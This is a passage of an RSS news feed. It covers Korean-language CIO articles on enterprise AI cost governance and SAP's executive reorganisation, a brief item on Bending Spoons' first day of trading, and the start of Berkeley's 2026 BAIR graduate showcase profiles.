<p>페이스는 “AI를 한 조직이 개발하고 다른 조직이 단순히 넘겨받는 방식이 아니라, 처음부터 조직 전체가 함께 책임지는 운영 모델을 구축하는 데 집중했다”라며 “AI 기능을 조기에 중앙집중화해 전사 목표와 일치시키는 한편, 각 사업부는 실제 업무 맥락을 제공해 AI 활용이 실질적인 성과로 이어지도록 했다”라고 말했다.</p>



<p>콕스 비즈니스는 아키텍처 자체에도 기본적으로 가시성을 내장했다.</p>



<p>페이스는 “모든 AI 트래픽은 AI 게이트웨이와 런타임 보안 솔루션을 거친다”라며 “온프레미스와 클라우드 기반 환경 모두 동일하게 적용된다”라고 설명했다.</p>



<p>이 같은 아키텍처는 네트워크 모니터링까지 확장된다.</p>



<p>페이스는 “네트워크를 통해 들어오고 나가는 모든 트래픽을 확인할 수 있으며, 회사 기기에서 어떤 서비스가 실행되고 있는지도 파악할 수 있다”라며 “표준 경로를 벗어난 트래픽 패턴이 발견되면 직원들과 협력해 규정을 준수할 수 있도록 지원한다”라고 말했다.</p>



<p>동시에 직원들이 필요한 AI 도구를 자유롭게 사용할 수 있는 환경도 마련했다.</p>



<p>페이스는 “‘틀 안의 자유(Freedom in a Framework)’라는 원칙 아래 다양한 AI 생태계와 기능을 제공하고 있다”라며 “대부분의 직원은 업무에 필요한 모든 AI 도구를 이용할 수 있다고 느낀다”라고 밝혔다.</p>



<h2 class="wp-block-heading">비용보다 더 중요한 문제</h2>



<p>모든 조직이 AI 비용 가시성 확보를 최우선 과제로 삼는 것은 아니다. 일부 기업은 다른 문제를 더 중요하게 보고 있다.</p>



<p>코너스톤 리서치의 레슬리는 “현재는 의도적으로 비용 가시성을 우선순위에서 뒤로 미뤄두고 있다”라며 “더 어려운 문제는 우리 업무의 특성 자체”라고 말했다.</p>



<p>코너스톤 리서치는 고도의 정확성이 요구되는 소송 지원 업무를 수행하는 기업으로, 전문가 보고서에는 오류가 허용되지 않는다.</p>



<p>레슬리는 “신뢰를 훼손하지 않으면서 AI의 이점을 어떻게 활용할 것인지가 가장 큰 과제”라며 “비용도 중요하지만, 지금 단계에서는 가장 큰 제약 요인은 아니다”라고 설명했다.</p>



<p>레슬리는 비용 최적화를 어렵게 만드는 또 다른 요인도 지적했다. AI 비용을 가장 많이 사용하는 사람이 오히려 가장 높은 성과를 내는 경우가 많다는 것이다.</p>



<p>그는 “전체 AI 비용의 약 80%가 사용자 10%에게서 발생하며, 이들은 대부분 중요한 업무를 수행하는 가장 숙련된 인력”이라며 “모든 사용자에게 동일한 비용 상한선을 적용하면 오히려 장려해야 할 핵심 활용 사례를 제한할 위험이 있다”라고 말했다.</p>



<p>현재 코너스톤은 일정 수준 이상의 비용이 발생하면 추가 승인 절차를 거치도록 하되, 필요한 경우 예외를 허용하는 방식을 운영하고 있다.</p>



<p>레슬리는 “AI 비용이 많이 발생하는 사용자는 낭비를 의미하는 것이 아니라 높은 가치를 창출하는 업무를 수행하고 있다는 신호인 경우가 많다”라고 말했다.</p>



<h2 class="wp-block-heading">조직 규모가 달라지면 접근법도 달라진다</h2>



<p>AI 비용 가시성 확보 방식은 조직 규모에 따라서도 달라진다.</p>



<p>아마존에서 10년간 근무한 뒤 코너스톤으로 자리를 옮긴 레슬리는 두 기업의 차이를 이렇게 설명했다.</p>



<p>레슬리는 “아마존은 단순히 규모가 큰 것이 아니라 사업 영역도 훨씬 다양하다”라며 “그 정도 규모에서는 단순한 규칙이 비효율적이라는 것을 알면서도, 복잡성을 관리하기 위해서는 획일적인 기준을 적용할 수밖에 없는 경우가 많다”라고 말했다.</p>



<p>반면 코너스톤에서는 보다 세밀한 관리가 가능하다.</p>



<p>그는 “피드백 주기가 충분히 짧기 때문에 각 조직 책임자와 직접 대화해 몇 분 만에 팀의 목표를 파악할 수 있다”라며 “덕분에 어떤 경우에는 비용을 더 투입하는 것이 합리적인지 확신을 갖고 판단할 수 있으며, 상황에 맞는 맞춤형 비용 관리가 가능하다”라고 설명했다.</p>



<p>콕스 비즈니스는 규모가 커지면서 또 다른 접근 방식을 선택했다.</p>



<p>페이스는 “AI 우수성 센터(CoE) 밖에서 엔터프라이즈 애플리케이션을 개발하는 조직에는 실행 역량을 분산시키는 대신, 자본 투자는 중앙에서 관리하는 체계를 구축했다”라고 말했다.</p>



<p>또한 토큰 사용 예산은 중앙에서 관리하되, AI 사용량이 많은 부서와는 지속적으로 관련 정보를 공유하고 있으며, 주요 사용 부서와 정기적으로 논의해 실제 비즈니스 가치를 평가하고 있다고 설명했다.</p>



<h2 class="wp-block-heading">AI 비용 관리, 무엇이 효과적인가</h2>



<p>아직 AI 비용 가시성을 구축하는 단계에 있는 조직이라면 기본부터 시작하는 것이 중요하다.</p>



<p>프로티비티의 리트럼은 “우선 AI 자산 목록을 만드는 것부터 시작해야 한다. 보이지 않는 것은 관리할 수도 없다”라며 “IT, 보안, 법무, 사업부에 명확한 책임을 부여하고, 이를 일회성 프로젝트가 아닌 지속적인 관리 체계로 운영해야 한다”라고 조언했다.</p>



<p>우선순위를 정하는 것도 중요하다.</p>



<p>리트럼은 “완벽함을 추구하다가 실행을 미루지 말아야 한다”라며 “민감한 데이터를 다루거나 고객 대상 의사결정, 규제 대상 업무와 관련된 AI 활용 사례처럼 위험도가 높은 영역부터 우선 관리해야 한다. 이러한 영역에 적절한 통제 장치를 마련한 뒤 점진적으로 범위를 확대하는 것이 바람직하다”라고 설명했다.</p>



<p>가트너는 조달 단계에서 AI 구매 항목을 별도로 구분해 관리하고, IT 재무관리 시스템에서도 AI 지출을 독립적으로 추적할 것을 권고했다. 또한 다음 클라우드 및 SaaS 계약 갱신 전에 AI 관련 비용 조항을 계약에 포함하도록 협상할 필요가 있다고 제안했다.</p>



<p>콕스 비즈니스는 거버넌스를 단순한 통제 수단이 아니라 우선순위를 명확히 하는 도구로 활용하고 있다.</p>



<p>페이스는 “더 빠르게 비즈니스 가치를 창출할 수 있는 일에 조직의 역량을 집중하기 위해 필요할 때는 과감하게 ‘아니오’라고 말해왔다”라고 밝혔다.</p>



<h2 class="wp-block-heading">예산보다 더 큰 위험</h2>



<p>일부 조직에서는 AI 비용이 통제 불가능한 수준으로 증가하는 것보다 AI를 잘못 사용하는 것이 더 큰 위험일 수 있다.</p>



<p>레슬리는 “섀도 IT의 핵심은 비용 통제가 아니라 평판 리스크”라며 “기업의 특성과 AI 활용 방식에 따라 무분별한 AI 사용은 실제로 심각한 피해를 초래할 수 있다. 바로 그 위험을 관리하는 것이 더 중요하다”라고 말했다.</p>



<p>AI 비용에 대한 가시성을 확보하는 것은 분명 중요하다. 그러나 일부 CIO에게는 지금 보이지 않는 더 중요한 문제가 따로 있을 수도 있다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP, AI 조직 CEO 직속으로 재편…제품·엔지니어링 총괄 체계 개편]]></title>
<description><![CDATA[SAP가 AI 중심 기업으로의 전환을 가속하기 위해 올해 들어 두 번째 경영진 조직 개편에 나섰다.



첫 번째 개편은 지난 3월 이뤄졌다. SAP는 고객 성공(Customer Success) 조직과 고객 서비스 및 딜리버리(Customer Services and Delivery) 조직을 통합해 ‘고객 가치 그룹(Customer Value Group)’을 신설했다. 



이를 통해 영업, 구축, 서비스, 기술지원 등 고객 관련 기능을 고객 서비스 및 딜리버리 담당 이사회 멤버였던 토마스 자우어에시히(Thomas Sauere...]]></description>
<link>https://tsecurity.de/de/3640152/it-nachrichten/sap-ai-ceo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640152/it-nachrichten/sap-ai-ceo/</guid>
<pubDate>Thu, 02 Jul 2026 07:03:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SAP가 AI 중심 기업으로의 전환을 가속하기 위해 올해 들어 두 번째 경영진 조직 개편에 나섰다.</p>



<p>첫 번째 개편은 지난 3월 이뤄졌다. SAP는 고객 성공(Customer Success) 조직과 고객 서비스 및 딜리버리(Customer Services and Delivery) 조직을 통합해 ‘고객 가치 그룹(Customer Value Group)’을 신설했다. </p>



<p>이를 통해 영업, 구축, 서비스, 기술지원 등 고객 관련 기능을 고객 서비스 및 딜리버리 담당 이사회 멤버였던 토마스 자우어에시히(Thomas Saueressig)에게 일원화했다. 현재 자우어에시히는 최고고객책임자(CCO)를 맡고 있다.얼마 지나지 않아 SAP는 제품 및 엔지니어링을 총괄하는 이사회 멤버 무함마드 알람(Muhammad Alam)이 2027년 3월 계약 만료 후 연임하지 않기로 결정했다고 발표했다.알람의 후임을 즉시 선임하지 않기로 한 SAP는 그의 업무를 다른 경영진에게 분산하기로 했다. </p>



<p><a href="https://www.bloomberg.com/news/articles/2026-06-30/sap-distributes-ai-product-oversight-to-ceo-coo-in-reshuffle" target="_blank" rel="nofollow">블룸버그에 따르면</a> 산업 AI 부문을 제외한 알람의 모든 조직은 크리스티안 클라인(Christian Klein) CEO가 직접 총괄하며, 산업 AI 조직은 세바스티안 슈타인호이저(Sebastian Steinhäuser) 최고운영책임자(COO)가 맡는다.또 SAP는 새로운 제품 총괄 임원을 선임하기 위해 미국을 중심으로 외부 인재를 물색할 계획이다. 다만 해당 직책의 역할과 조직 체계는 아직 구체적으로 정해지지 않은 것으로 알려졌다.</p>



<p>알람은 제품 전략과 개발을 비롯해 SAP의 글로벌 제품·엔지니어링 조직과 소프트웨어 애플리케이션 전반을 총괄해왔다.</p>



<h2 class="wp-block-heading">AI 전환 가속화</h2>



<p>이번 조직 개편은 SAP의 AI 전환을 앞당기고 경쟁력을 강화하기 위한 조치라고 SAP는 설명했다.</p>



<p>SAP 대변인은 CIO와의 이메일 인터뷰에서 “SAP는 AI 기반 자율기업(Autonomous Enterprise)으로의 전환을 가속하기 위해 조직을 재편하고 있다”라며 “새로운 조직 구조는 AI, 데이터, 핵심 애플리케이션을 더욱 긴밀하게 연결해 SAP의 프로세스 전문성을 기반으로 한 통합 엔드투엔드 솔루션을 제공할 수 있도록 한다”라고 밝혔다.</p>



<p>이어 “이번 개편은 심도 있는 프로세스 전문성, 신뢰할 수 있는 데이터, 유연한 플랫폼을 결합해 대규모 환경에서도 차별화되고 신뢰할 수 있는 비즈니스 AI를 구현할 수 있도록 한다”라며 “이를 통해 차세대 엔터프라이즈 소프트웨어 시장에서 SAP의 경쟁력을 더욱 강화할 것”이라고 설명했다.</p>



<p>몇 달 사이 두 차례 경영진 개편이 이뤄진 점을 우려할 수도 있지만, 무어 인사이트 앤드 스트래티지(Moor Insights &amp; Strategy)의 부사장 겸 수석 애널리스트 제이슨 앤더슨(Jason Andersen)은 고객의 소프트웨어 업그레이드 부담을 해결하기 위해 필요한 변화라고 평가했다.</p>



<p>앤더슨은 “AI는 기술적으로 이러한 문제를 완화할 잠재력이 있지만 기업 문화와 산업별 요구사항, 규제 환경 등 해결해야 할 과제가 여전히 많다”라며 “고객의 시스템 전환을 지원하는 업무가 새로운 혁신과 성장 기회 창출에 필요한 역량을 분산시킬 수도 있다”라고 분석했다.</p>



<p>이어 “올봄 토마스 자우어에시히의 역할이 확대된 것은 기존 고객 기반을 현대화해야 하는 과제가 얼마나 큰지를 보여준다”라며 “이번에 크리스티안 클라인 CEO가 제품 조직을 직접 맡게 된 것은 SAP를 ‘SaaS 우선(SaaS-first)’ 기업에서 ‘AI 우선(AI-first)’ 기업으로 전환하기 위한 또 하나의 대규모 과제를 추진하기 위한 것”이라고 말했다.</p>



<h2 class="wp-block-heading">AI만으로는 가치 창출 어렵다</h2>



<p>인포테크 리서치 그룹(Info-Tech Research Group)의 수석 리서치 디렉터 테라 히긴슨(Terra Higginson)은 “기업들이 AI 투자 대비 성과 격차(value gap)를 본격적으로 문제 삼기 시작했다”라며 “이번 리더십 개편은 SAP가 AI만으로는 충분한 가치를 창출할 수 없다는 점을 인식하고 있음을 보여준다”라고 평가했다.</p>



<p>이어 “SAP는 전략이 실행 과정에서 어디에서 힘을 잃고 있는지 파악하려 하고 있지만, 이는 SAP만의 문제가 아니다”라며 “같은 문제가 소프트웨어 업계 전반에서 나타나고 있다”라고 설명했다.</p>



<p>그레이하운드 리서치(Greyhound Research)의 수석 애널리스트 산치트 비르 고기아(Sanchit Vir Gogia)는 “이번 조직 개편은 AI 실행 문제가 이미 해결됐다는 의미가 아니라, AI 전략과 실행에 대한 책임을 강화하겠다는 신호로 보는 것이 맞다”라며 “분명한 것은 SAP가 AI와 고객 도입, 클라우드 중심 실행을 축으로 운영 모델을 다시 구축하고 있다는 점”이라고 분석했다.</p>



<p>고기아는 이번 개편 시점을 “엔터프라이즈 소프트웨어 산업의 경제성에 가해지는 현실적인 압박”에 대응한 것으로 해석했다.</p>



<p>그는 “경영진의 강한 의지만으로 AI 에이전트가 재무나 급여 업무를 안전하게 처리할 수 있는 것은 아니다”라며 “지금 필요한 것은 무조건적인 기대도 과도한 불안도 아닌, 신중하고 냉정한 접근”이라고 말했다.</p>



<p>또 CIO가 SAP에 가장 먼저 던져야 할 질문은 “이번 조직 개편으로 우리 IT 환경에서 실제 무엇이 달라지는가”라고 조언했다.</p>



<p>그는 “제품 로드맵의 책임자가 바뀌는지, 출시 일정은 어떻게 달라지는지, 계약상 책임은 어떻게 달라지는지를 확인해야 한다”라며 “계약을 갱신하거나 프로젝트를 이사회에 설명할 때 실제로 중요한 것은 바로 이 문제”라고 설명했다.</p>



<h2 class="wp-block-heading">제품보다 계약서를 살펴야</h2>



<p>고기아는 SAP가 제품에 AI 기능을 확대하는 만큼 CIO들도 제품 홍보보다 계약 내용을 더욱 면밀히 검토해야 한다고 조언했다.</p>



<p>특히 AI 모델 제공업체와의 책임 범위, 고객 데이터 활용 방식, 데이터 활용 거부(옵트아웃) 권리 등이 계약서에 명확하게 규정돼 있는지 확인해야 한다고 말했다.</p>



<p>고기아는 “SAP가 고객 데이터를 제3자 AI 모델 학습에 사용하지 않는다고 말한다면, 그 약속은 홈페이지가 아니라 계약서에 명시돼 있어야 한다”라며 “AI 기능이 기본 제공에서 사용량 기반 과금으로 전환될 경우 과금 방식도 계약서에서 명확히 규정해야 한다”라고 밝혔다.</p>



<p>이어 “워크플로우가 SAP와 타사 시스템을 오갈 경우 최종 책임이 누구에게 있는지가 가장 중요한 문제”라며 “책임 주체를 명확히 할 수 없는 제품 약속은 약속이 아니라 구호에 불과하다”라고 지적했다.</p>



<p>그러면서 “엔터프라이즈 고객은 조직 개편 자체에 주목할 것이 아니라 SAP의 운영 모델을 면밀히 검증해야 한다”라고 조언했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bending Spoons defies SaaS slump, surges 40% on first day of trading]]></title>
<description><![CDATA[The company has grown rapidly by acquiring and revamping last-generation tech brands like AOL, Eventbrite, Evernote, Meetup, and Vimeo.]]></description>
<link>https://tsecurity.de/de/3639873/ai-nachrichten/bending-spoons-defies-saas-slump-surges-40-on-first-day-of-trading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639873/ai-nachrichten/bending-spoons-defies-saas-slump-surges-40-on-first-day-of-trading/</guid>
<pubDate>Thu, 02 Jul 2026 00:48:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The company has grown rapidly by acquiring and revamping last-generation tech brands like AOL, Eventbrite, Evernote, Meetup, and Vimeo.]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 BAIR Graduate Showcase]]></title>
<description><![CDATA[Congratulations to the Berkeley Artificial Intelligence Research (BAIR) Lab class of 2026! This year, BAIR celebrates another remarkable group of Ph.D. graduates whose curiosity, creativity, and perseverance have pushed the frontiers of artificial intelligence and machine learning.

Their work sp...]]></description>
<link>https://tsecurity.de/de/3639545/ai-nachrichten/2026-bair-graduate-showcase/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639545/ai-nachrichten/2026-bair-graduate-showcase/</guid>
<pubDate>Wed, 01 Jul 2026 21:33:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- twitter -->










<p>Congratulations to the Berkeley Artificial Intelligence Research (BAIR) Lab class of 2026! This year, BAIR celebrates another remarkable group of Ph.D. graduates whose curiosity, creativity, and perseverance have pushed the frontiers of artificial intelligence and machine learning.</p>

<p>Their work spans the breadth of modern AI — robotics and embodied intelligence, large language models and reasoning, computer vision, generative modeling, AI safety, human-AI interaction, AI for science and healthcare, and much more. Along the way, they have published influential research, built systems with real-world impact, mentored their peers, and shaped the BAIR community for the better.</p>

<p>Now they are headed everywhere ideas travel: to faculty and postdoctoral positions, to industry research labs, and to startups of their own founding — and several are still exploring what comes next and would love to hear from you.</p>

<p>Please join us in celebrating the achievements of these wonderful graduates. We are proud of everything they have accomplished at Berkeley, and we can’t wait to see what they do next!</p>

<!--more-->

<p><small><i>Thank you to our friends at the <a href="https://ai.stanford.edu/blog/sail-graduates/">Stanford AI Lab</a> for this idea!</i></small></p>

<hr>

<div class="container">
  <div class="row">
    
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://bfshi.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/baifeng-shi.jpg" alt="Baifeng Shi" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Baifeng Shi</h1><br>
              <strong>Email:</strong><a href="mailto:baifeng_shi@berkeley.edu"> baifeng_shi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://bfshi.github.io/">https://bfshi.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> I work on building generalist vision and robotic models.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at Physical Intelligence
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://sea-snell.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/charlie-snell.jpg" alt="Charlie Snell" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Charlie Snell</h1><br>
              <strong>Email:</strong><a href="mailto:csnell22@berkeley.edu"> csnell22@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://sea-snell.github.io/">https://sea-snell.github.io</a><br>
              
              <strong>Advisor(s):</strong> Dan Klein<br>
              
              <strong>Research Blurb:</strong> My work aims to understand when and how the different LLM scaling paradigms can be traded off and interchanged. In particular, test-time scaling treats each prompt independently, drawing long chains of inferences and then forgetting them entirely between prompts. This differs critically from pretraining, which instead learns a compressed representation from a large dataset. I believe bridging the gap between these methods of scaling computation, presents a key open challenge in the field: how can we develop methods which turn the inferences drawn at test-time back into learned representations that the model can hold onto across interactions.<br>
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://devinguillory.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/devin-guillory.jpg" alt="Devin Guillory" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Devin Guillory</h1><br>
              <strong>Email:</strong><a href="mailto:dguillory@berkeley.edu"> dguillory@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://devinguillory.com/">https://devinguillory.com</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> Accounting for data shifts in computer vision models<br>
              
              
              <strong>What's next:</strong> Building collaborative AI systems, looking for conspirators.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://efleisig.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/eve-fleisig.jpg" alt="Eve Fleisig" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Eve Fleisig</h1><br>
              <strong>Email:</strong><a href="mailto:efleisig@berkeley.edu"> efleisig@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://efleisig.com/">https://efleisig.com</a><br>
              
              <strong>Advisor(s):</strong> Dan Klein<br>
              
              <strong>Research Blurb:</strong> I design language models to work reliably and fairly for the broad range of real LLM users. First, my research leverages disagreement among user preferences as signal, in order to train and evaluate LLMs for entire populations of users. Second, I work on designing rigorous evaluations to extricate challenging LLM harms that diverse users face. Finally, I work on core technical failures of LLMs, like miscalibrated confidence, to reduce downstream risks when models are deployed to users with different needs. Combined, these interventions facilitate building LLMs that minimize societal harms, and maximize benefits to a wider range of real-world users.<br>
              
              
              <strong>What's next:</strong> Postdoctoral fellow at Princeton CITP
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://graceluo.net/"><img src="https://bair.berkeley.edu/static/blog/grads2026/grace-luo.jpg" alt="Grace Luo" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Grace Luo</h1><br>
              <strong>Email:</strong><a href="mailto:graceluo@berkeley.edu"> graceluo@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://graceluo.net/">https://graceluo.net</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> My research is on interpreting and controlling generative models. For example, I've worked on re-purposing image generators for computer vision tasks, and meta-modeling language activations for better LLM probing and steering.<br>
              
              
              <strong>What's next:</strong> Research scientist in industry
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://hanlinzhu.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/hanlin-zhu.jpg" alt="Hanlin Zhu" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Hanlin Zhu</h1><br>
              <strong>Email:</strong><a href="mailto:hanlinzhu@berkeley.edu"> hanlinzhu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://hanlinzhu.com/">https://hanlinzhu.com/</a><br>
              
              <strong>Advisor(s):</strong> Stuart Russell, Jiantao Jiao<br>
              
              <strong>Research Blurb:</strong> My research centers on understanding and improving the reasoning capabilities of large language models (LLMs).<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at OpenAI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://haozhi.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/haozhi-qi.jpg" alt="Haozhi Qi" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Haozhi Qi</h1><br>
              <strong>Email:</strong><a href="mailto:hqi@berkeley.edu"> hqi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://haozhi.io/">https://haozhi.io/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik, Yi Ma<br>
              
              <strong>Research Blurb:</strong> Dexterous Manipulation and Robot Learning<br>
              
              
              <strong>What's next:</strong> Research scientist at Amazon; Faculty at University of Chicago
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://zamfi.net/"><img src="https://bair.berkeley.edu/static/blog/grads2026/j-d-zamfirescu-pereira.jpg" alt="J.D. Zamfirescu-Pereira" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>J.D. Zamfirescu-Pereira</h1><br>
              <strong>Email:</strong><a href="mailto:zamfi@berkeley.edu"> zamfi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://zamfi.net/">https://zamfi.net</a><br>
              
              <strong>Advisor(s):</strong> Bjoern Hartmann<br>
              
              <strong>Research Blurb:</strong> My research focuses on effective human-AI co-design. I study the boundaries of language interfaces as a medium for interacting with AI, creating systems that blend language-focused interactions with structured user interfaces that draw on different levels of abstraction. I focus on language-oriented technologies, like LLMs and text-to-image models, that are powerful mediators of design processes. These technologies enable humans to describe their desires at almost any level of abstraction, from high-level goals vaguely specified (“I’d like a game to help my kid learn to read”) to low-level corrections of undesired outputs (“Don’t say ‘I know because I’ve tasted it’ when about a recipe substitution's taste”).<br>
              
              
              <strong>What's next:</strong> Assistant Professor, Computer Science, UCLA
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://jlian2.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/jiachen-lian.jpg" alt="Jiachen Lian" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Jiachen Lian</h1><br>
              <strong>Email:</strong><a href="mailto:jiachenlian@berkeley.edu"> jiachenlian@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://jlian2.github.io/">https://jlian2.github.io</a><br>
              
              <strong>Advisor(s):</strong> Gopala Anumanchipalli<br>
              
              <strong>Research Blurb:</strong> My research focuses on human-centered AI across speech, healthcare, and systems.<br>
              
              
              <strong>Looking for:</strong> Look for AI talents to join our startup
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://joshuaminwookang.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/josh-kang.jpg" alt="Josh Kang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Josh Kang</h1><br>
              <strong>Email:</strong><a href="mailto:minwoo_kang@berkeley.edu"> minwoo_kang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://joshuaminwookang.github.io/">https://joshuaminwookang.github.io/</a><br>
              
              <strong>Advisor(s):</strong> John Canny<br>
              
              <strong>Research Blurb:</strong> I study language modeling and related topics in NLP; specific interests are human user simulation and building conversational, collaborative AI agents.<br>
              
              
              <strong>What's next:</strong> AI Scientist at Mistral AI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.linkedin.com/in/junhao-bear-xiong"><img src="https://bair.berkeley.edu/static/blog/grads2026/junhao-bear-xiong.jpg" alt="Junhao (Bear) Xiong" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Junhao (Bear) Xiong</h1><br>
              <strong>Email:</strong><a href="mailto:junhao_xiong@berkeley.edu"> junhao_xiong@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.linkedin.com/in/junhao-bear-xiong">https://www.linkedin.com/in/junhao-bear-xiong</a><br>
              
              <strong>Advisor(s):</strong> Jennifer Listgarten, Yun Song<br>
              
              <strong>Research Blurb:</strong> Junhao (Bear) Xiong is a PhD candidate at UC Berkeley, advised by Jennifer Listgarten and Yun S. Song. His work focuses on machine learning methods for biology, with an emphasis on generative modeling for proteins. Previously, he studied Applied Math and Computer Science at Johns Hopkins.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://kaylolittlejohn.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kaylo-littlejohn.jpg" alt="Kaylo Littlejohn" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kaylo Littlejohn</h1><br>
              <strong>Email:</strong><a href="mailto:kaylo_littlejohn@berkeley.edu"> kaylo_littlejohn@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kaylolittlejohn.com/">https://kaylolittlejohn.com</a><br>
              
              <strong>Advisor(s):</strong> Gopala Anumanchipalli<br>
              
              <strong>Research Blurb:</strong> My research is focused on speech modeling and natural language processing. I co-led the development of multimodal AI tools to accurately translate brain activity into text, audible personalized speech, and a high-fidelity "digital talking avatar" (Nature 2023, Nature Neuroscience 2025). I am also tech lead for voice modeling at Roblox.<br>
              
              
              <strong>Looking for:</strong> Research Scientist / Engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://kentkc.org/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kent-chang.jpg" alt="Kent Chang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kent Chang</h1><br>
              <strong>Email:</strong><a href="mailto:kentkchang@berkeley.edu"> kentkchang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kentkc.org/">https://kentkc.org</a><br>
              
              <strong>Advisor(s):</strong> David Bamman<br>
              
              <strong>Research Blurb:</strong> I work on NLP and multimodal machine learning, with a focus on evaluating large language models and building multimodal systems for understanding dialogue, narrative, and social interaction. My research includes benchmarks for LLM memorization, multimodal datasets sourced from feature films and television, and studies of model behavior. I'm interested in bridging computational methods with questions from the humanities and social sciences about whose voices get represented in AI systems, and about AI's broader impact. My work has appeared at EMNLP and ACL, among others.<br>
              
              
              <strong>Looking for:</strong> (teaching) faculty, Research Scientist, ML/AI SWE
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
